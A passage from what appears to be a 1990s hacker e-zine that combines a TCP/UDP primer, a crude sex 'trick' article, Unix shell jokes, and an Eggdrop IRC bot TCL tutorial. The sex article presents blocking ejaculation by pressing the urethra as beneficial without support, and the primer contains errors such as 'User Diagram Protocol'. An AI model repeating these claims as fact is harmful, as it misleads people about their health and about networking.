      * Destination port: A 16-bit field that identifies the remote 
      machine's TCP user.
      
      * Sequence number: A number indicating the current block's position in 
      the overall message. This number is also used between two TCP 
      implementations to provide the initial send sequence (ISS) number.
      
      * Acknowledgment number: A number that indicates the next sequence 
      number expected. In a backhanded manner, this also shows the sequence 
      number of the last data received; it shows the last sequence number 
      received plus 1.
      
      * Data offset: The number of 32-bit words that are in the TCP header. 
      This field is used to identify the start of the data field.
      
      * Reserved: A 6-bit field reserved for future use. The six bits must 
      be set to 0.
      
      * Urg flag: If on (a value of 1), indicates that the urgent pointer 
      field is significant.
      
      * Ack flag: If on, indicates that the Acknowledgment field is 
      significant.
      
      * Psh flag: If on, indicates that the push function is to be 
      performed.
      
      * Rst flag: If on, indicates that the connection is to be reset.
      
      
      * Syn flag: If on, indicates that the sequence numbers are to be 
      synchronized. This flag is used when a connection is being 
      established.
      
      * Fin flag: If on, indicates that the sender has no more data to send. 
      This is the equivalent of an end-of-transmission marker.
      
      * Window: A number indicating how many blocks of data the receiving 
      machine can accept.
      
      * Checksum: Calculated by taking the 16-bit one's complement of the 
      one's complement sum of the 16-bit words in the header (including 
      pseudo-header) and text together. (A rather lengthy process required 
      to fit the checksum properly into the header.)
      
      
      * Urgent pointer: Used if the urg flag was set; it indicates the 
      portion of the data message that is urgent by specifying the offset 
      from the sequence number in the header. No specific action is taken by 
      TCP with respect to urgent data; the action is determined by the 
      application.
      
      * Options: Similar to the IP header option field, this is used for 
      specifying TCP options. Each option consists of an option number (one 
      byte), the number of bytes in the option, and the option values. Only 
      three options are currently defined for TCP:
      
      
      * Padding: Filled to ensure that the header is a 32-bit multiple.
      
      Next i will cover how TCP establishes a connection in EXACT process 
      this will help you understand TCP i think
      
      A connection can be established between two machines only if a 
      connection between the two sockets does not exist, both machines agree 
      to the connection (Like a handshake eh) and both machines have the 
      resources available. If any of them conditions aren't met then the 
      connection cant be made
      
      The acceptance of connections can be triggered by an application or a 
      system administration routine. Once a connection is established, it is 
      given certain properties that are valid until the connection is closed
      
      Typically, these are a precedence value and a security value. These 
      settings are agreed upon by the two applications when the connection 
      is in the process of being established
      
      (Sends a global notice for hackphreak users to wake up :p)
      
      In most cases, a connection is expected by two applications, so they 
      issue active or passive open requests, (Ok lets get how its really 
      done), The process begins with
      
      Machine A's TCP receiving a request for a connection from its ULP, to 
      which it sends an active or primitive to Machine B. The segment that 
      is constructed has the SYN flag set on (set to 1) and has a sequence 
      number assigned
      
      The application on machine B has issued a passive open instruction to 
      its TCP. When the SYN SEQ 50 segment is received, Machine B's TCP 
      sends an acknowledgment back to machine A with the sequence number of 
      51. Machine B also sets an ISS
      
      Number of its own (Initial Send Sequence number) This shows this 
      message as "ACK 51; SYN 200," indicating that the message is an 
      acknowledgment with sequence number 51, it has the SYN flag set, and 
      has an IIS of 200
      
      upon receipt, Machine A sends back its own acknowledgment message with 
      sequence number set to 201. This is "ACK 201" Then, having opened and 
      acknowledged the connection machine a and machine B both send
      
      connection open messages through the ULP to the requesting 
      applications it is not necessary for the remote machine to have 
      passive open instruction, as mentioned earlier. In this case the 
      sending
      
      machine provides both the sending and receiving socket numbers, as 
      well as precedence, security, and timeout values. It is common for two 
      applications to request an active open at the same time. This is 
      resolved quite easily, Although it does involve a little
      
      more network traffic.
      
      I will describe data transfer and how it occurs but not closing 
      connections etc.. because that's long stuff :p
      
      Transferring information is straightforward, For each block of data 
      received my machines A's TCP from the ULP, TCP encapsulates it and 
      sends it to Machine B with an increasing sequence number. After 
      Machine B receives the message it acknowledges it with a segment a 
      acknowledgement that 
      
      increments the next sequence number (and hence indicates that it has 
      received everything up to that sequence)
      
      The TCP data transport actually embodies six subservices
      
      1. Full duplex: Enables both ends of a connection to transmit at any 
      time, even simultaneously
      
      2. Timeliness: Use of timers to ensure that data is transmitted within 
      a reasonable amount of time
      
      3. Ordered: Data sent from one application is received in the same 
      order at the other end this occurs despite the fact that the datagrams 
      might be received out of order through IP, because TCP reassembles the 
      message in the correct order before passing it up to higher layers
      
      4. Labeled: All connections have an agreed-upon precedence and 
      security value
      
      5. TCP can regulate the flow of information through the use of buffers 
      and window limits
      
      6. Checksums ensure that data is free of errors (Within checksums 
      algorithm's limits)
      
      Ok now that i have completed that lets move on to the promised stuff 
      on UDP
      
      UDP: User Diagram Protocol just for your notes or whatever just an 
      explanation of the acronym
      
      TCP is a connection-based protocol. There is times where a 
      connectionless protocol is required, so UDP is used. UDP is used with 
      both Trivial File Transfer Protocol (TFTP) and the remote call 
      procedure. Connectionless communications don't provide reliability,
      
      meaning that there is no indication to the sending device that a 
      message has been received correctly. Connectionless protocols also do 
      not offer error-recovery capabilities which must be either ignored
      
      or provided in the higher or lower layers. UDP is much more simple 
      than TCP it interfaces with IP (and or other protocols" without the 
      bother of flow control or error correction mechanisms, acting simply 
      as a sender and receiver of datagrams.
      
      The UDP message header is much much simpler than TCP's. the following 
      is the fields of a UDP header
      
      * Source port: An optional fields with the port number. If a port 
      number is not specifies, the field is set to 0
      
      * Destination port: The port on the destination machine
      
      * Length: The length of the datagram, including header and data
      
      * Checksum: A 16-bit one's complement of ones's complement sum of the 
      datagram, including a pseudoheader similar to that of TCP.
      
      Well thats basicly it for UDP a very simple protocol.
      
       I have to admit in this lecture i havent covered alot of things basic 
      things that were involving with TCP/IP but i dident because of time & 
      compression besides there is enuf OSI stuff. But expect to see more 
      text from me here. 
      
       Well i dident cover UDP but hell. I will make more text files on like 
      UDP and IPv6, IPv6 isn't ANSI yet but i suppose it will be 
      
      Shouts : B0g, Rhino9, b0g, gH, b0g, #hackphreak, b0g, mosthated, b0g, 
      #k-rad, grimreapa, b0g, rafay, b0g, system_v, b0g, HFG and all u's i 
      missed.
      
      
      b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
      
      b0g           b0g!#               !b0     b0  #@!       b0g!#      #@!
      b0g          !b0g!#@              !b0     b0  #@      @!b0g!#@     #@!
      b0g         @!b0g!#@!             !b0    !b0  #@     #@!    #@!    #@!
      b0g  @!     @!b  !#@!             !b0  #@!b0g!#@!b  !#@  0   @!b   #@!
      b0g #@!b   #@!b   #@!   !#@!b0g!  !b0 !#@!b0g!#@!b  !#  b0g!#@!b   #@!
      b0g!#@!b0  #@!b   #@!  g!#@!b0g!  !b0 !#@!b0g!#@!b g!# !b0g!#@ b0  #@!
      b0g!#@!b0g #@!b   #@! 0g!#  b0g!  !b0    !b  !#    g! @!b  !#@ b0  #@!
      b0g   !b0g #@!b   #@! 0g!#  b0g!  !b0   @!b  !#    g! @!b  !#@ b0  #@!
      b0g   !b0g #@!b   #@! 0g!   b0g!  !b0   @!b  !#    g! @!b  !#@ b0  #@!
      b0g   !b0g #@!b   #@! 0g!   b0g!  !b0 !#@!b0g!#@!  g! @!b  !#@ b0  #@!
      b0g   !b0g #@!b   #@! 0g!   b0g!  !b  !#@!b0g!#@!  g! @!b  !#@ b0  #@ 
      b0g   !b0g #@!b   #@! 0g!# !b0g!        @!  g!     g!# !b0g!#@!b0     
      b0g!#@!b   #@!b0g!#@!  g!#@!b0g!  !b0  #@!  g!      !# !b0g!#@!b   #@!
      b0g!#@!b    @!b0g!#@   g!#@!b0g!  !b0  #@! 0g!      !#@ b0 !#@!b   #@!
       0g!#@!      !b0g!#     !#@ b0g!  !b0  #@  0g        #@!           #@!
                                  b0g!                       !b0g!#@!       
                             g!#@!b0g                         b0g!#@        
                             g!#@!b0                                        
                             g!#@!b                                         
      
      b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
      
      
      
      
      
      
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      [ b0g article # 3 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ :::::::::::::: Sex0r guide  k-rad-bob - 808@c2i.net ::::::::::::: ]
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      
      
      
      #Short guide to better sex.
      
      
      In this short article I'm going to share a little secret with you.
      I haven't met many people who actually knows about this trick, and it 
      always make me feel so good about myself when I meet them after a 
      given period of time since I sk00led them in the noble art of 
      seks0ring.
      The trick itself is as simple as it is useful.
      
      
      Here are just some of the advantages it has:
      
      
              #You won't smell like crusted semen.
      
              #You can masturbate almost anywhere at any time.
              Just wear a baggy pair of pants and you're in the clear!
      
      #You don't spoil the climax of you orgasm by searching for 
      tissue and/or aiming
      
              #Your chick won't swallow : ( ?
              Now she doesn't have to, yet you still orgasm in her mouth!#@$!
      
              #Did we say less messy?
      
              #You will maintain your erection for much longer
      
      #It drastically shortens the "recovery" time between each 
      "sesion"
      
              #Also you'll be able to last much longer
      
      #If you don't see the potential in this your an complete idiot.
      
      
      Sounds too good to be true?
      It's not. It's also mad easy.
      
      Here follows a brief sk00ling section.
      I tried to make some leet ASCII illustrations but i got to horny :/
      
      
      
      #Step one.      
      Have some sort of sexual activity, where your penis is stimulated.
      
      
      
      #Step two.      
      As you are approaching your orgasm, quickly locate the secret spot.
      The spot is the "tube" that your sperm is being pumped through as it 
      travels for freedom, fortune and glory, and the promised land.
      The best exact location is right below your nutsack.
      
      
      
      #Step three.    
      As you come, gently use any number of fingers, i use my left or right 
      pointerfinger, and gently press down on the "pipe". Your 
      orgasm will take place and the semen being shot through your tube will 
      be stopped dead in its track, only to retreat. :)
      Keep applying pressure to the spot until your muscles have stopped 
      pumping.
      
      That is!
      
      
      [Note, if you think this is a cheap way to prevent your chick from 
      getting pregnant you are total flamboyant idiot. So for you braindead 
      assmunchs out there, read this:
      WARNING! If you don't use any form for birthcontrol while using this 
      trick chances are she's going to end up pregnant.]
      
      
      
      
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      [ b0g article # 4 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ :::::::::: Shell fun  some g1mp  abuse@microsoft.com ::::::::::: ]
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      
      
      
      Some humorous things to do to a UNIX system:
      
       >From the csh (c shell):
      
       % make love
       Make: Don't know how to make love. Stop.
      
       % got a light?
       No match.
      
       % sleep with me
       bad character
      
       % man: Why did you get a divorce?
       man:: Too many arguments.
      
       % rm God
       rm: God nonexistent
      
       % make 'heads or tails of all this'
       Make: Don't know how to make heads or tails of all this. Stop.
      
       % make sense
       Make: Don't know how to make sense. Stop.
      
       % make mistake
       Make: Don't know how to make mistake. Stop.
      
       % make bottle.open
       Make: Don't know how to make bottle.open. Stop.
      
       % \(-
       (-: Command not found.
      
       % rm -i God
       rm: remove God? y
       % ls God
       God not found
       % make light
       Make: Don't know how to make light. Stop.
      
       % date me
       You are not superuser: date not set
       Thu Aug 25 15:52:30 PDT 1988
      
       % man rear
       No manual entry for rear.
      
       % If I had a ) for every dollar Reagan spent, what would I have?
       Too many )'s.
      
       % * How would you describe George Bush
       *: Ambiguous.
      
       % %Vice-President
       %Vice-President: No such job.
      
       % ls Meese-Ethics
       Meese-Ethics not found
      
       % "How would you rate Reagan's senility?
       Unmatched ".
      
       % [Where is Jimmy Hoffa?
       Missing ].
      
       % ^How did the^sex change operation go?
       Modifier failed.
      
       % cp /dev/null sex;chmod 000 sex
       % more sex
       sex: Permission denied
       % mv sex show
       % strip show
       strip: show: Permission denied
      
       % who is my match?
       No match.
      
       % set i="Democratic_Platform";mkdir $i;chmod 000 $i;ls $i
       Democratic_Platform unreadable
      
       % awk "Polly, the ship is sinking"
       awk: syntax error near line 1
       awk: bailing out near line
      
       % %blow
       %blow: No such job.
      
       % 'thou shalt not commit adultery'
       thou shalt not commit adultery: Command not found.
      
       And from the bourne shell (sh):
      
       $ drink < bottle;opener
       bottle: cannot open
       opener: not found
      
       $ test my argument
       test: too many arguments
      
       $ "Amelia Earhart"
       Amelia Earhart: not found
      
       $ PATH=pretending! /usr/ucb/which sense
       no sense in pretending!
      
       $ man -kisses dog
       dog: nothing appropriate
      
       $ mkdir "Yellow Pages";fiYellow Pages
       $ mkdir matter;cat > matter
       matter: cannot create
      
       $ lost
       lost: not found
      
       $ found
       found: not found
      
       $ i=Hoffa ;>$i ;$i ;rm $i ;rm $i
       Hoffa: cannot execute
       rm: Hoffa nonexistent
      
       The following are ones that I can't get to work on my BSD 4.3, so I 
      suppose
       that they are stuff from ATT SysV or some other such:
      
       % strip bra
       bra: Cannot open
      
       % sccs what bottle
       can't open bottle (26)
      
       $ cat "door: paws too slippery"
       can't open door: paws too slippery
      
       $ cat food_in_tin_cans
       cat: can't open food_in_tin_cans
      
      
      
      
      
      ...........................................
      ...#""""""#................................
      ..." ~  ~ "................................
      ..(  0  0  ).. /------------------------\..
      ...|  <>  |... |                        |..
      ...| /""\ |...< I am dumb!              |..
      ...| ____ |... |                        |..
      ...||    ||... \------------------------/..
      ....\/.................................
      ......||...................................
      
      
      
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      [ b0g article # 5 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ ::::::::::::::: TCL Guide  Prae  prae@talk21.com ::::::::::::::: ] 
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      
      
      
       [ note from the editor, ever write somehting in pico again and ill 
      kill you with my bare hands, i spendt 4 hours editing this too make it 
      look alright!@$ youll see what i mean near the end :((( ]
      
      
      
      
      
      
      This document is made to help explain how to make TCL scripts for the 
      eggdrop. It covers BASIC concepts, and programming.  I suggest that 
      you have a copy of tcl-commands.doc handy, for this document will 
      refer to it many a time.  I hope this helps in learning TCL and good 
      luck!
      
            Outline:
               I
                    -
                     Triggers for code (Events/Binds)
              II
                    -
                     Procedures explained.
              III
                    -
                     Variables, If statements
              IV
                    -
                     String manipulation commands (string & l commands)
               V
                    -
                     Loops
              VI
                    -
                     User-get/User-set
              VII
                    -
                     Return command
             VIII
                    -
                     Good Programming Habits
              IX
                    -
                     Commands, in sample code & explained.
      
      
      
       ## I - Triggers for code (Events/Binds) ##
      
      Eggdrop operates on an event based system.  If I type 'hello' to the 
      channel, the eggdrop matches that text against a list of events 
      (referred to as binds) for channel commands.  The eggdrop contains 
      many events: pubm (public text matching), mode (channel mode changes), 
      nick nick changes), join (joins to the channel), part (parts of the 
      channel), and many others; they may be found in tcl-commands.doc.
      
       Syntax for bind:
      
          bind <type> <flags> <match> <proc name>
      
      
      
       Example:
      
          bind join - * join:join
      
      
      
       The type of bind is triggered when some one joins a channel, the '-' 
      stands for any flag (you could have put an 'o' to signify to only 
      execute the procedure when he has Op Access) and the match matches the 
      address/nick/channel (This accepts wild cards, explain further in 
      section IV). The procedure 'join:join' is the part of code which it 
      executes if the bind is matched up correctly.
      
       Another Example:
      
          bind dcc O sayhi dcc:sayhi
      
      
      
       If someone in DCC chat party line, with channel op access (and 
      console is to that channel), or global op access types '.sayhi' it 
      will execute the procedure 'dcc:sayhi'.  In Eggdrop 1.1.x the default 
      binds are prefixed with the type of bind then a ':' then the name; in 
      this document I will also follow that form.
      
       A list of flags may be obtained via .help whois in DCC chat
      
       
       ## II - Procedures Explained ##
      
       A procedure is a section of code which may be called by anything in a 
      program. For Eggdrop's use, this where all the code goes for on 
      events.  When an action takes place and a bind is triggered it calls a 
      procedure to take action.  For example if you wanted to write your own 
      auto-op script, when ever a person with op access joins the channel it 
      would call a procedure and then the procedure would send the command 
      to give ops.
      
       syntax for procedures:
      
          proc <name of procedure> { <needed variables> } { body }
      
      
      
       When a bind is triggered it gives certain information to the 
      procedure that is required to do any thing, information such as nicks, 
      hosts, handles, and any other arguments needed.  This was taken from 
      tcl-commands.doc from the info of the bind pubm.
      
          procname <nick> <user@host> <handle> <channel> <text>
      
      
       What this says is when ever a pubm bind is triggered you need 
      variablesto put these 5 pieces of information.  You can call the 
      variables any thing you choose, it could be a, b, c, d and e. I 
      suggest using something short, and to the point; such as nick, host, 
      hand, chan, and text.
       Example of a bind, and a procedure:
      
          bind pubm - hello pubm:hello
          proc pubm:hello {nick host handle chan text} {
            putserv "PRIVMSG $chan :Hello $nick"
          }
      
      
      
       # The Bind #
           public match (pubm)
           flags needed to trigger: None (- means none)
           triggered by: hello
           procedure to be called: pubm:hello
      
       # The Procedure #
           putserv is a command which sends text to the server.
           PRIVMSG is a server command for sending private msgs.
           $chan is the variable that will contain the channel which it 
      occurred on
      $nick is the variable that will contain the nickname of who said 
      "hello"
      
       !!!PLEASE NOTE!!!: When using RAW IRC commands you need to put a ':' 
      in front of text that has more than one word, such as the message of a 
      msg.
      
       The same thing can also be accomplished with this
      
          bind pubm - hello pubcommand_hello
          proc pubcommand_hello {n uh h chan t} {
            puthelp "PRIVMSG $n :Hello $n!"
          }
      
      
      
       The bind is basically the same I just changed the name of the 
      procedure.  In the procedure I changed the name of the variables, I 
      used 'n' instead of 'nick' and so on.  However I did use a different 
      command.  Puthelp is a Eggdrop command which queues the text so as not 
      to flood the bot.  I HIGHLY SUGGEST USING THIS!  :)
      
          (*) Use putserv when you need some thing to happen 
      instantaneously.  Like a kick, or a ban.
      
          (*) Use pushmode when you want modes to stack to be send as groups 
      to the server (e.g '+ooo
          |mmortal Ernst Ec|ipse'), and instantaneous speed is not 
      necessary.
      
          (*) Use puthelp when messaging people, or channels.
      
      
      
       syntax for puthelp:
      
          puthelp "<raw server command> <Arguments>"
      
      
      
       Example:
      
          puthelp "NOTICE $nick :Hi there $nick!"
      
      
       same syntax applies for putserv and putmode as well
      
       If you notice <message> is only one space, that's why you need the 
      ""'s (quotes).  If you do not put the quotes there you get the error 
      msg: TCL error: called "puthelp" with too many arguments.  So you put 
      the quotes to show that it belongs only in one spot.
      
       Procedures can also call themselves, without the need for a bind.  
      For instance if there is one particular thing you must have done in 
      ALL of your procedures; and don't feel like writing it.  In this 
      example you have to send a msg too the person every time he does a 
      command, here is  some sample code:
      
          bind pubm - kick pubm:kick
          proc pubm:kick {nick host hand chan text} {
            noaccess $nick
          }
      
          proc noaccess {who} {
            puthelp "PRIVMSG $who :Sorry $who, you do not have access to 
      that
          command"
          }
      
      
      
       noaccess is accessable by any procedure in the bot, so any time you 
      want to say some one doesn't have
       access, just call noaccess.
      
       !!!PLEASE NOTE!!!: I've seen this question about 100 times, and even 
      asked it my self once.  Never use 'args' as a variable in procedures 
      it does strange things.  It puts brackets ({}'s) around the variables 
      and causes big problems if one does not know how to use it.
      
         (back to top)
      
       ## III - Variables, If statements ###
      
       Variables
      
       A variable is where you assign a symbol, or word (such as $nick) a 
      value. This value can be a string (words, or sentences) or a numeral.  
      In TCL there are 2 main types of variables: global, and private.  A 
      global variable is when you want to store information in it, and wish 
      other procedures to use.  A private variable could be a variable that 
      you use in a procedure, which does not need to be used outside of that 
      procedure.
      
       syntax for setting a variable:
      
          set <variable> <data>
      
      
       Example:
      
          set name "Prae"
      
      
      
       To unset a variable, simply use the command unset.
      
       syntax for unsetting a variable:
      
          unset <variable>
      
      
       Example:
      
          unset name
      
      
      
       When using the variable, put a '$' infront of it so the procedure 
      understands it is a variable.  So the variable 'name' would be used in 
      the code as '$name'.
      
       Additional Notes: To distinguish between a global, and private 
      variable simply use a 'global' command at the top of the proc.  When 
      setting the variable, or using a global statement the '$' is not 
      needed.
      
       syntax for global:
      
          global <variable names separated by spaces>
      
      
       Example:
      
          proc test {a b c d e} {
            global name owner botnick
          }
      
      
      
       Eggdrop has some pre-set global variables, such as the bot's nick 
      ($botnick). They are (taken from
       tcl-commands.doc):
      
         botnick
           current nickname the bot is using, ie 'Valis' or 'Valis0', etc
      
         botname
           current nick!user@host that the server sees, ie 
      'Valis!valis@crappy.com'
      
         server
           current server the bot is using, ie 'irc.math.ufl.edu:6667'
      
         version
           current bot version (ie: "1.1.2+pl1 1010201 pl1");
             first item is the text version, second item is a numerical
      version, and any following items are the names of patches that have 
      been added
      
         uptime
           unixtime value for when the bot was started
      
       To use them inside a proc, you must declare them as global at the 
      beginning of your proc (e.g 'global botnick').  You'll see better uses 
      for variables in the section IV
      
      
       If Statement:
      
       One of the most important aspects of a programming language is an 
      'if' statement.  It will return a TRUE, or FALSE statement and execute 
      the commands with such association.  If statement use a logic type of 
      approach; like:
      
          If 1 is equal to 1 times 1 then do this <> or else do this <>.
      
      
      
       syntax for if:
      
          if {v1 <operator> v2} {do this if true} else {do this if false 
      (optional)}
      
      
       or
      
          if {v1 <operator> v2} {do this if true} {do this if false 
      (optional)}
      
      
       notice the omission of else in the second example, both formats will 
      perform the same function.
      
       These are some of the operators avaliable:
      
              ==
                    -
                       (equal)
              !=
                    -
                       (not equal)
              <=
                    -
                       (Less than/equal to)
              >=
                    -
                       (Greater than/equal to)
               <
                    -
                       (Less than)
               >
                    -
                       (Greater than)
              &&
                    -
                       (equivalent to and)
               ||
                    -
                       (equivalent to or)
      
      
       Example:
      
          if {$nick == $botnick} {
            putmsg $chan "I am $nick!!!"
          } else {
            putmsg $chan "I am NOT $nick"
          }
      
      
      
       This says if the value of $nick is the same as the value of $botnick 
      then it sends a msg to the chan saying "I am $nick", and if not saying 
      "I am not $nick".
      
       !!!PLEASE NOTE!!!: IT IS CASE SENSITIVE
       !!!PLEASE NOTE!!!: IT IS CASE SENSITIVE
       !!!PLEASE NOTE!!!: IT IS CASE SENSITIVE
       !!!PLEASE NOTE!!!: IT IS CASE SENSITIVE
       Did you get that? Maybe once more
       !!!PLEASE NOTE!!!: IT IS CASE SENSITIVE
      
       Case Sensitive Defined: Where the CaPs MaTtErs.  Such as 'HELLO' is 
      not the same as 'hello'.
      
       Now this is where TCL starts to differ from other programming 
      languages that I've encountered.  Lets say you want to write a check 
      to see if $nick is an op on $chan.  Well some languages could use an 
      operator like if $nick isop $chan. Not TCL...
      
       There is a procedure called 'isop'.
       This was taken from tcl-commands.doc
      
       syntax for isop:
      
          isop <nickname> <channel>
      
      
            returns: "1" if someone by that nickname is on the channel and 
      has chop;
                     "0" otherwise
      
       How do you use this in a if statement? This is how
      
       Example:
      
          if {[isop $nick $chan] == 1} {
            putmsg $chan "$nick is an op on $chan"
          } else {
            putmsg $chan "$nick is NOT an op on $chan"
          }
      
      
      
       Now the same can also be written like this:
      
          if {[isop $nick $chan] == 0} {
            putmsg $chan "$nick is NOT an on $chan"
          }
      
      
       and so on.
      
       Or like this:
      
          if {[isop $nick $chan] != 1} {body}
      
      
       or
      
          if {[isop $nick $chan] != 0} {body}
      
      
      
       As you can see you have many choices here, I suggest, since an else 
      statement is optional, you use the if statement where the statement is 
      true or false and execute the code, and don't use an else statement.  
      What I mean by this is lets say you want the following: if the bot 
      isn't an op then msg the chan and ask for ops.
      
       You can do this 2 ways, here is the harder way:
      
          if {[botisop $chan] == 1} {
          } else {
            putmsg $chan "Please opme!
          }
      
      
       As you can see I didn't want anything to happen if he does have ops, 
      so you could change the first line to some thing like:
      
          if {[botisop $chan] != 1} {putmsg $chan "Please opme!"}
      
      
       or
      
          if {[botisop $chan == 0} {putmsg $chan "Please opme!"}
      
      
      
       TCL will interpert
      
          if {[botison $chan] == 1} {}
      
      
       the same as
      
          if {[botisop $chan]} {}
      
      
      
       If the statement is true it executes the {}. So there is no need for 
      a == 1
      
       As will
      
          if {[botisop $chan] == 0} {}
          if {![botisop $chan]} {}
      
      
       ! is the negate of whats in the []
      
       Either one would suit you fine.
      
       There are 100's more commands like this for anything from checking 
      flags, to doing ANY THING with the eggdrop.  Again all in tcl-
      commands.doc (it almost sounds like I'm doing a commercial for tcl-
      command.doc dosn't it?).
      
      
       ## IV - String Manipulation Commands (string and l commands) ##
      
       You want to make a public kick program, so ops can type !kick <nick> 
      <reason>. One problem, how do you extract those arguments from $text 
      (or equivalent variable)?  lindex, and lrange.
      
       These are core tcl commands so they won't be found in tcl-
      commands.doc here is there descriptions: (from the TCL help file).
      
       NAME
       lindex - Retrieve an element from a list
      
       SYNOPSIS
       lindex list index 
      
       DESCRIPTION
       This command treats list as a Tcl list and returns the index'th 
      element from it (0 refers to the first element of the list).  In 
      extracting the element, lindex observes the same rules concerning 
      braces and quotes and backslashes as the Tcl command interpreter; 
      however, variable substitution and command substitution do not occur.  
      If index is negative or greater than or equal to the number of 
      elements in value, then an empty string is returned.  If index has the 
      value end, it refers to the last element in the list.
      
       Example:
      
          [lindex "0 1 2 3 4 5 6 7 8 9 10" 5]
      
      
       would return 5
      
          [lindex "a b c d e f g h i" 2]
      
      
       would return c (0 is the first parameter in the string!)
      
       Now here is the public kick program:
      
          bind pub O !kick pub:kick
          proc pub:kick {nick host hand chan text} {
            set whom [lindex $text 0]
            putserv "KICK $chan $whom :$nick told me so!"
          }
      
      
       # The Bind #
           public command (pub)
           flags needed to trigger: Channel Specific/Global Operator
           command to trigger: !kick <person>
           procedure to be called: pub:kick
      
       # The Procedure #
           whom is a private variable and will be erased when the proc is 
      finished.
           The lindex takes the first parameter in $text (which is the 
      person) and
           sets it to whom the putserv kicks the person.
      
       What if you wanted to add a definable kick msg?  Make the program a 
      little more fancy.  The command is lrange, it takes the parameters 
      from N'th index to N'th index.  Here it is from the TCL help file:
      
       NAME
       lrange - Return one or more adjacent elements from a list
      
       SYNOPSIS
       lrange list first last
      
       DESCRIPTION
       List must be a valid Tcl list.  This command will return a new list 
      consisting of elements first through last, inclusive.  First or last 
      may be end (or any abbreviation of it) to refer to the last element of 
      the list.  If first is less than zero, it is treated as if it were 
      zero.  If last is greater than or equal to the number of
       elements in the list, then it is treated as if it were end.  If first 
      is greater than last then an empty string is returned.  Note: 
      "lrangelist first first" does not always produce the same result as 
      "lindexlist first" (although it often does for simple fields that 
      aren't enclosed in braces); it does, however, produce exactly the same 
      results as "list [lindexlist first]"
      
       So you would need to take parameter 1 for text, and to the end...
      
       This is how you would do it:
      
          bind pub O !kick pub:kick
          proc pub:kick {nick host hand chan text} {
            set whom [lindex $text 0]
            set reason [lrange $text 1 end]
            putserv "KICK $chan $whom :$reason"
          }
      
      
      
       Lets make it even more spoofy, what about if $nick isn't on the 
      channel?  Well we need an if statement don't we?  Look in tcl-
      commands.doc for the command.
      
       Here is the program:
      
          bind pub O !kick pub:kick
          proc pub:kick {nick host hand chan text} {
            set whom [lindex $text 0]
            set reason [lrange $text 1 end]
            if {[onchan $whom $chan]} {
              putserv "KICK $chan $whom :$reason"
            } else {
              puthelp $chan "$nick: $whom is not on $chan"
            }
          }
      
      
      
       This is from the TCL help file, I'll give examples for a few, but I'm 
      sure you can figure it out
      
       NAME
       string - Manipulate strings
      
       SYNOPSIS
       string option arg ?arg ...? 
      
       DESCRIPTION
       Performs one of several string operations, depending on option.  The 
      legal options (which may be abbreviated) are:
      
       string compare string1 string2
           Perform a character-by-character comparison of strings string1 
      and string2
           in the same way as the C strcmp procedure.  Return -1, 0, or 1, 
      depending
           on whether string1 is lexicographically less than, equal to, or 
      greater
           than string2.
      
       string first string1 string2
           Search string2 for a sequence of characters that exactly match 
      the
           characters in string1.  If found, return the index of the first 
      character
           in the first such match within string2.  If not found, return -1.
      
       string index string charIndex
           Returns the charIndex'th character of the string argument.  A 
      charIndex of
           0 corresponds to the first character of the string.  If charIndex 
      is less
           than 0 or greater than or equal to the length of the string then 
      an empty
           string is returned.
      
       string last string1 string2
           Search string2 for a sequence of characters that exactly match 
      the
           characters in string1.  If found, return the index of the first 
      character
           in the last such match within string2.  If there is no match, 
      then return
           -1.
      
       string length string
           Returns a decimal string giving the number of characters in 
      string.
      
       string match pattern string
      See if pattern matches string; return 1 if it does, 0 if it doesn't.
      Matching is done in a fashion similar to that used by the C-shell.  
      For the two strings to match, their contents must be identical except 
      that the following special sequences may appear in pattern:
      
           *     Matches any sequence of characters in string, including a 
      null
                   string.
          
           ?       Matches any single character in string.
          
           [chars] Matches any character in the set given by chars.  If a 
      sequence of
                   the form x-y appears in chars, then any character between 
      x and y,
                   inclusive, will match.
          
           \x     Matches the single character x. This provides a way of 
      avoiding the
                   special interpretation of the characters *?[]\ in 
      pattern.
      
       string range string first last
           Returns a range of consecutive characters from string, starting 
      with the
           character whose index is first and ending with the character 
      whose index
           is last.  An index of 0 refers to the first character of the 
      string.  An
           index of end (or any abbreviation of it) refers to the last 
      character of
           the string.  If first is less than zero then it is treated as if 
      it were
           zero, and if last is greater than or equal to the length of the 
      string
           then it is treated as if it were end.  If first is greater than 
      last then
           an empty string is returned.
      
       string tolower string
           Returns a value equal to string except that all upper case 
      letters have
           been converted to lower case.
      
       string toupper string
           Returns a value equal to string except that all lower case 
      letters have
           been converted to upper case.
      
       string trim string ?chars?
           Returns a value equal to string except that any leading or 
      trailing
           characters from the set given by chars are removed.  If chars is 
      not
           specified then white space is removed (spaces, tabs, newlines, 
      and
           carriage returns).
      
       string trimleft string ?chars?
           Returns a value equal to string except that any leading 
      characters from
           the set given by chars are removed.  If chars is not specified 
      then white
           space is removed (spaces, tabs, newlines, and carriage returns).
      
           This is usefull for creating bans!!!
           Here is a sample kick ban script I wrote...
      
          proc pubm:kickban {nick host hand chan text} {
            set whom [lindex $text 0]
            set mask [trimleft [maskhost [getchanhost $whom $chan]] *!]
            set mask *!*$mask
            putmsg $chan "* Kick and Ban $nick ($mask) because [lrange $text 
      1 end]"
            putserv "MODE -o+b $whom $mask"
            putserv "KICK $whom :[lrange $text 1 end]
          }
      
      
           Notice I had to extract the person who is getting KB'd from text.  
      I then
           had to get his host from the command getchanhost (tcl-
      commands.doc), and
           then make it a usable mask host for bans.  However maskhost 
      returns it's
           value in *!user@*.machine.end I need a *!*, so I used 'trimleft' 
      and it
           did my job.
      
       string trimright string ?chars?
           Returns a value equal to string except that any trailing 
      characters from
           the set given by chars are removed.  If chars is not specified 
      then white
           space is removed (spaces, tabs, newlines, and carriage returns).
      
       string wordend string index
           Returns the index of the character just after the last one in the 
      word
